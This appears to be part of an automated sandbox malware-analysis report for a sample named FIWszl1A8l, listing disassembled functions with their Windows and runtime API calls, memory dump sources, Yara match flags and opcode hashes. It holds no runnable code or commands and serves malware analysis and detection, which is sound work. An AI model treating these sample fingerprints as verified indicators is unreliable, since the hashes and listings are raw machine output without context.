                                                                                                  • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                  • String ID:
                                                                                                  • API String ID: 781180411-0
                                                                                                  • Opcode ID: a8f3861582775e4144096f0e87e531ffc4ff7a936c2e7efd4eaff789d9c310d4
                                                                                                  • Instruction ID: 6752af9f81bea024345ff23c601fe9c8fa585cf940102fb2a4423aa052626d11
                                                                                                  • Opcode Fuzzy Hash: a8f3861582775e4144096f0e87e531ffc4ff7a936c2e7efd4eaff789d9c310d4
                                                                                                  • Instruction Fuzzy Hash: 74E04F3781960967CF043FF18D0EB9F7A2CDE81354F10C800FA1897112DA28980187A5
                                                                                                  Function 009257F7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 135COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3782668054.0000000000920000.00000040.00001000.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_920000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _memset$_vswprintf_s
                                                                                                  • String ID: D
                                                                                                  • API String ID: 3424173483-2746444292
                                                                                                  • Opcode ID: c8561399999e88f50518954755fe2256d0c041f48f054e3226c8471d41118f6d
                                                                                                  • Instruction ID: f0fad18f47caea0b84a0a3c42c6efbdaf0205cab15a916844266ed421c25e65b
                                                                                                  • Opcode Fuzzy Hash: c8561399999e88f50518954755fe2256d0c041f48f054e3226c8471d41118f6d
                                                                                                  • Instruction Fuzzy Hash: 354165B0A40318EFE721DB60DC85FAA77BCAF58704F50859CF64DAA184D6B1DA84CF94
                                                                                                  Function 0282780F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 131COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset$_vswprintf_s
                                                                                                  • String ID: D
                                                                                                  • API String ID: 3424173483-2746444292
                                                                                                  • Opcode ID: cf7116fa26cd05665a4fc66a2bfa2b13dadcbba7699ed49424b3b1d6dc26d4e0
                                                                                                  • Instruction ID: 4a1c27a510af990165b335169046a7d1f20e316ce7c14faa62b393221d392686
                                                                                                  • Opcode Fuzzy Hash: cf7116fa26cd05665a4fc66a2bfa2b13dadcbba7699ed49424b3b1d6dc26d4e0
                                                                                                  • Instruction Fuzzy Hash: 3941C5B9900228ABEB20DB65DC94FDEB7BCAB48700F1041D9E60DE6180EBB05BC5CF54
                                                                                                  Function 03FAC10B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 131COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset$_vswprintf_s
                                                                                                  • String ID: D
                                                                                                  • API String ID: 3424173483-2746444292
                                                                                                  • Opcode ID: cf7116fa26cd05665a4fc66a2bfa2b13dadcbba7699ed49424b3b1d6dc26d4e0
                                                                                                  • Instruction ID: 02b698feb956edb2b7dfc3caac796f3436b8c13be172f77540ec6da27e719fbf
                                                                                                  • Opcode Fuzzy Hash: cf7116fa26cd05665a4fc66a2bfa2b13dadcbba7699ed49424b3b1d6dc26d4e0
                                                                                                  • Instruction Fuzzy Hash: 9841A4B1A00358ABEB20DBA5DC84FDE77BCAB48700F5041D9E60DA61C0EAB05B85CF64
                                                                                                  Function 02D09430 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 02D0944A
                                                                                                    • Part of subcall function 02D0EF86: std::exception::exception.LIBCMT ref: 02D0EF9B
                                                                                                    • Part of subcall function 02D0EF86: __CxxThrowException@8.LIBCMT ref: 02D0EFB0
                                                                                                    • Part of subcall function 02D0EF86: std::exception::exception.LIBCMT ref: 02D0EFC1
                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 02D09482
                                                                                                    • Part of subcall function 02D0EF39: std::exception::exception.LIBCMT ref: 02D0EF4E
                                                                                                    • Part of subcall function 02D0EF39: __CxxThrowException@8.LIBCMT ref: 02D0EF63
                                                                                                    • Part of subcall function 02D0EF39: std::exception::exception.LIBCMT ref: 02D0EF74
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                  • String ID: invalid string position$string too long
                                                                                                  • API String ID: 1823113695-4289949731
                                                                                                  • Opcode ID: 4cd4e5b097fdb645109da70b0679657d9fb6966f7bfaf7d306a3f7f7c0747a3f
                                                                                                  • Instruction ID: 67c284fc0e564035f78e1bcd2c0164ffccc6f60a2beb986d52b40be229b4e0bb
                                                                                                  • Opcode Fuzzy Hash: 4cd4e5b097fdb645109da70b0679657d9fb6966f7bfaf7d306a3f7f7c0747a3f
                                                                                                  • Instruction Fuzzy Hash: 492184327042108BD720996CF8D0BDAF7D9EB91A64F60092BE192CB7E2D761DC44C7A5
                                                                                                  Function 02D084B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 02D084C9
                                                                                                    • Part of subcall function 02D0EF86: std::exception::exception.LIBCMT ref: 02D0EF9B
                                                                                                    • Part of subcall function 02D0EF86: __CxxThrowException@8.LIBCMT ref: 02D0EFB0
                                                                                                    • Part of subcall function 02D0EF86: std::exception::exception.LIBCMT ref: 02D0EFC1
                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 02D084E7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                  • String ID: invalid string position$string too long
                                                                                                  • API String ID: 963545896-4289949731
                                                                                                  • Opcode ID: 6f31d4bf3a6669b4e92f3b2d56dc492048398f272334cb94bb54019a9c106da4
                                                                                                  • Instruction ID: 9886620dd4c0fc0630fbeb39416b78f58a4ae40f1065f51938a092fe11cfd4c2
                                                                                                  • Opcode Fuzzy Hash: 6f31d4bf3a6669b4e92f3b2d56dc492048398f272334cb94bb54019a9c106da4
                                                                                                  • Instruction Fuzzy Hash: A82160717003069B8B18DF68E8D4E5D73AAFF883147104569E516CB7A1E770ED54CBA4
                                                                                                  Function 00933A27 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___BuildCatchObject.LIBCMT ref: 00933A3A
                                                                                                    • Part of subcall function 00933995: ___BuildCatchObjectHelper.LIBCMT ref: 009339CB
                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 00933A51
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3782668054.0000000000920000.00000040.00001000.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_920000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: BuildCatchObject$FramesHelperNestedUnwind
                                                                                                  • String ID: csm$csm
                                                                                                  • API String ID: 3487967840-3733052814
                                                                                                  • Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                                  • Instruction ID: 89c3320d0474645247c3c67212eae3c11149a552edfa3944202bf333f7b9d033
                                                                                                  • Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                                  • Instruction Fuzzy Hash: C601F23104010ABBDF12AF51CD4AFAB7F6AEF48354F108010BD5865661E776DAB1EFA1
                                                                                                  Function 0284031A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___BuildCatchObject.LIBCMT ref: 0284032D
                                                                                                    • Part of subcall function 02840288: ___BuildCatchObjectHelper.LIBCMT ref: 028402BE
                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 02840344
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: BuildCatchObject$FramesHelperNestedUnwind
                                                                                                  • String ID: csm$csm
                                                                                                  • API String ID: 3487967840-3733052814
                                                                                                  • Opcode ID: a4ec08a577bcb042cc7356b16b645f83b0b4d35d15726398ffe3570c0dbe416a
                                                                                                  • Instruction ID: a09745e068ffd7918f554851a4fca93550bee942cce2d07acd7e995c9d4619f6
                                                                                                  • Opcode Fuzzy Hash: a4ec08a577bcb042cc7356b16b645f83b0b4d35d15726398ffe3570c0dbe416a
                                                                                                  • Instruction Fuzzy Hash: 5F01243D40010ABBCF166E55CC84EEB3F6AEF18348F044010FE1C98520DB3698A1EBE1
                                                                                                  Function 03FC4C16 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___BuildCatchObject.LIBCMT ref: 03FC4C29
                                                                                                    • Part of subcall function 03FC4B84: ___BuildCatchObjectHelper.LIBCMT ref: 03FC4BBA
                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 03FC4C40
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: BuildCatchObject$FramesHelperNestedUnwind
                                                                                                  • String ID: csm$csm
                                                                                                  • API String ID: 3487967840-3733052814
                                                                                                  • Opcode ID: a4ec08a577bcb042cc7356b16b645f83b0b4d35d15726398ffe3570c0dbe416a
                                                                                                  • Instruction ID: 4563dbfb44f9b017e7b824652b24ed7b6ae5f01f9e6945be19f0f40124ccf789
                                                                                                  • Opcode Fuzzy Hash: a4ec08a577bcb042cc7356b16b645f83b0b4d35d15726398ffe3570c0dbe416a
                                                                                                  • Instruction Fuzzy Hash: F601283549028BBBCF13EE52CE54EEA7F6AEF08354F044018BD1819170D736D961DBA0
                                                                                                  Function 02D0D830 Relevance: 6.4, APIs: 5, Instructions: 140COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 02D0D868
                                                                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 02D0D938
                                                                                                  • SetLastError.KERNEL32(0000007F), ref: 02D0D963
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Read$ErrorLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 2715074504-0
                                                                                                  • Opcode ID: 3f371618415ec81d9a7a096c573b2324305ec41d599c40bfb71e54070a43573a
                                                                                                  • Instruction ID: e16aff95efb90e5ca38782ec3b1471843890c35b9aeb0391fa6249a72720ba41
                                                                                                  • Opcode Fuzzy Hash: 3f371618415ec81d9a7a096c573b2324305ec41d599c40bfb71e54070a43573a
                                                                                                  • Instruction Fuzzy Hash: 95418A71A00205ABDB20CF99E884B6AF7FAFF88714F14855AE84997395D770E911CB90
                                                                                                  Function 00929A9D Relevance: 6.1, APIs: 4, Instructions: 109COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3782668054.0000000000920000.00000040.00001000.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_920000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __calloc_crt__init_pointers__mtterm_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 3556499859-0
                                                                                                  • Opcode ID: 720715378607e4f18366517d453de5e5cb8b5ca67b172311fa18d72390665dd8
                                                                                                  • Instruction ID: 148008fcd7b6620a87ae7e1d45908d9404350381dc7647cd5a68707f2ca83662
                                                                                                  • Opcode Fuzzy Hash: 720715378607e4f18366517d453de5e5cb8b5ca67b172311fa18d72390665dd8
                                                                                                  • Instruction Fuzzy Hash: 8E314D31850E35EEFB21AF74AD887453EEAEB49361B188516E415D7274FB31C481CF50
                                                                                                  Function 028339D3 Relevance: 6.1, APIs: 4, Instructions: 109COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __calloc_crt__init_pointers__mtterm_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 3556499859-0
                                                                                                  • Opcode ID: 76c9643fd1df18821398edaab6323fbd9f0414cbbe87c74b2baaec3723e64a7d
                                                                                                  • Instruction ID: a3a8a6f61cb7402f9a47f69905400b52db23c05ea11359f7ea48bf7c7faa2e3a
                                                                                                  • Opcode Fuzzy Hash: 76c9643fd1df18821398edaab6323fbd9f0414cbbe87c74b2baaec3723e64a7d
                                                                                                  • Instruction Fuzzy Hash: CB316D39902A20EFFB13EB758C98A567FA5EB44B64B10455AF914C62B1E7348055EFC0
                                                                                                  Function 03FB82CF Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __calloc_crt__init_pointers__mtterm_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 3556499859-0
                                                                                                  • Opcode ID: 76c9643fd1df18821398edaab6323fbd9f0414cbbe87c74b2baaec3723e64a7d
                                                                                                  • Instruction ID: 0213ca6b7908a657e56a4a7e1db7d397d8197dbfa8c45dd6bac67ad5541eaef7
                                                                                                  • Opcode Fuzzy Hash: 76c9643fd1df18821398edaab6323fbd9f0414cbbe87c74b2baaec3723e64a7d
                                                                                                  • Instruction Fuzzy Hash: 23316F71D01761EFFB52EB769C98A967FB8EB847A0B18412AF914CB1B1EB308045DF50
                                                                                                  Function 02D1A5C2 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02D1A5F6
                                                                                                  • __isleadbyte_l.LIBCMT ref: 02D1A629
                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 02D1A65A
                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 02D1A6C8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                  • String ID:
                                                                                                  • API String ID: 3058430110-0
                                                                                                  • Opcode ID: 7e9d43dcdc434b73c7ac5d0c73062264c7bace4a1a8d70f182b185d4895e157c
                                                                                                  • Instruction ID: f2c8333fe6980e633d0a6ca0bf1151003e328b71834bfe8c595b45d9fbe2b916
                                                                                                  • Opcode Fuzzy Hash: 7e9d43dcdc434b73c7ac5d0c73062264c7bace4a1a8d70f182b185d4895e157c
                                                                                                  • Instruction Fuzzy Hash: E031F031A06286FFDB21DFA4E880ABE7BA5FF01314F1985A9E4618B790E730DD40CB50
                                                                                                  Function 0097E425 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0097E459
                                                                                                  • __isleadbyte_l.LIBCMT ref: 0097E48C
                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 0097E4BD
                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 0097E52B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                  • String ID:
                                                                                                  • API String ID: 3058430110-0
                                                                                                  • Opcode ID: c2c9c12bca1ee3cdcb1e296a90d2ea9fe7297d5409b954cf9ef21d25f34e9ef3
                                                                                                  • Instruction ID: b16ac348f07811ad121c13bb6f65cb6ecc8055f1e179f63df057810af8232ce9
                                                                                                  • Opcode Fuzzy Hash: c2c9c12bca1ee3cdcb1e296a90d2ea9fe7297d5409b954cf9ef21d25f34e9ef3
                                                                                                  • Instruction Fuzzy Hash: C031C332A04255EFDF10DF64C884AB93BA9AF09310F19C5E9F4698B1B1D730DD50DB51
                                                                                                  Function 02D08020 Relevance: 6.1, APIs: 4, Instructions: 91stringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: lstrlen$_memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 2425037729-0
                                                                                                  • Opcode ID: 41152bbc626d90be37df571ac941429cfeddbeb2b9d81119a76fbb94fe229bcd
                                                                                                  • Instruction ID: 34f27b5cb2f9fe16a845007b86ac8a2bfe84c17bb1e3fd617d31ed1a78318835
                                                                                                  • Opcode Fuzzy Hash: 41152bbc626d90be37df571ac941429cfeddbeb2b9d81119a76fbb94fe229bcd
                                                                                                  • Instruction Fuzzy Hash: A221D672B001199BCB248E68DCC0FBE73AAEBC4720B35426DED09C7761EB719D51D6A0
                                                                                                  Function 02D04380 Relevance: 6.1, APIs: 4, Instructions: 70networkCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SetLastError.KERNEL32(0000139F), ref: 02D043EC
                                                                                                    • Part of subcall function 02D013A0: HeapAlloc.KERNEL32(00000000,00000000,?,?,?,?), ref: 02D013CB
                                                                                                    • Part of subcall function 02D041E0: EnterCriticalSection.KERNEL32(02D04FB5,02D04E55,02D042BE,00000000,?,?,02D04E55,?,?,?,?,00000000,000000FF), ref: 02D041E8
                                                                                                    • Part of subcall function 02D041E0: LeaveCriticalSection.KERNEL32(02D04FB5,?,?,?,00000000,000000FF), ref: 02D041F6
                                                                                                    • Part of subcall function 02D04C70: HeapFree.KERNEL32(?,00000000,?,00000000,02D04E55,?,02D042C8,02D04E55,00000000,?,?,02D04E55,?), ref: 02D04C97
                                                                                                  • SetLastError.KERNEL32(00000000,?), ref: 02D043D7
                                                                                                  • SetLastError.KERNEL32(00000057), ref: 02D04401
                                                                                                  • WSAGetLastError.WS2_32(?), ref: 02D04410
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$CriticalHeapSection$AllocEnterFreeLeave
                                                                                                  • String ID:
                                                                                                  • API String ID: 2060118545-0
                                                                                                  • Opcode ID: 9538584b7105293616b9b507bed9eb8a66188b0dabba250bf0aa71eb9a0440f0
                                                                                                  • Instruction ID: 9d95e6bd5ef49dc2b2c29a4af9612c1812cec4bb607cc801ec7aec08523a133a
                                                                                                  • Opcode Fuzzy Hash: 9538584b7105293616b9b507bed9eb8a66188b0dabba250bf0aa71eb9a0440f0
                                                                                                  • Instruction Fuzzy Hash: C811A736A0551897CB10EE69F884A9EB7A8EF94322B0545AAFD0CD3350D7319E1586E0
                                                                                                  Function 00974380 Relevance: 6.1, APIs: 4, Instructions: 70networkCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SetLastError.KERNEL32(0000139F), ref: 009743EC
                                                                                                    • Part of subcall function 009713A0: HeapAlloc.KERNEL32(00000000,00000000,?,?,?,?), ref: 009713CB
                                                                                                    • Part of subcall function 00974C50: HeapFree.KERNEL32(?,00000000,?,00000000,00974E35,?,009742C8,00974E35,00000000,?,?,00974E35,?), ref: 00974C77
                                                                                                  • SetLastError.KERNEL32(00000000,?), ref: 009743D7
                                                                                                  • SetLastError.KERNEL32(00000057), ref: 00974401
                                                                                                  • WSAGetLastError.WS2_32(?), ref: 00974410
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$Heap$AllocFree
                                                                                                  • String ID:
                                                                                                  • API String ID: 1906775185-0
                                                                                                  • Opcode ID: 36de4e8aaec973190ba719ca9ab10cedbdc55f04f608bf908fb1065d2def063c
                                                                                                  • Instruction ID: 40a53f5c8b93f3b64259e240424253a2418c53e01632e75f4f586d7e65e695bf
                                                                                                  • Opcode Fuzzy Hash: 36de4e8aaec973190ba719ca9ab10cedbdc55f04f608bf908fb1065d2def063c
                                                                                                  • Instruction Fuzzy Hash: E4117337A095289BC710EF69F8846EEB7A8EB84722B1581AAED0DE7201D7359D0547D0
                                                                                                  Function 02D0DE70 Relevance: 6.1, APIs: 4, Instructions: 59memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _free.LIBCMT ref: 02D0DE93
                                                                                                  • _free.LIBCMT ref: 02D0DED5
                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,02D0DC95), ref: 02D0DEFC
                                                                                                  • HeapFree.KERNEL32(00000000), ref: 02D0DF03
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Heap_free$FreeProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 1072109031-0
                                                                                                  • Opcode ID: 1deea51bc5a964a9af7f0ad22e5f601f3f68c9d02650c6492e16add7c8cfc0c4
                                                                                                  • Instruction ID: e2968381a9ad4d6f4f41f9273cad5cc86cb4dd6a5497f4a89f53cb165c9464fc
                                                                                                  • Opcode Fuzzy Hash: 1deea51bc5a964a9af7f0ad22e5f601f3f68c9d02650c6492e16add7c8cfc0c4
                                                                                                  • Instruction Fuzzy Hash: F0114C71A007009BD730DAA5CD89B1773A6FB84710F14891DE59A47BA0DB74F842CF61
                                                                                                  Function 02D03BF0 Relevance: 6.1, APIs: 4, Instructions: 58networkCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • WSAEventSelect.WS2_32(?,02D03ABB,00000023), ref: 02D03C02
                                                                                                  • WSAGetLastError.WS2_32 ref: 02D03C0D
                                                                                                  • send.WS2_32(?,00000000,00000000,00000000), ref: 02D03C58
                                                                                                  • WSAGetLastError.WS2_32 ref: 02D03C63
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$EventSelectsend
                                                                                                  • String ID:
                                                                                                  • API String ID: 259408233-0
                                                                                                  • Opcode ID: d0fe6cf4d00b91c3e7f95f062ef6040247e1c2a7afd91781e24cd8f4069c2db3
                                                                                                  • Instruction ID: 404c1889805d8fe7535543bd134f0f32cba64ae649a1ba2684700cc27415873a
                                                                                                  • Opcode Fuzzy Hash: d0fe6cf4d00b91c3e7f95f062ef6040247e1c2a7afd91781e24cd8f4069c2db3
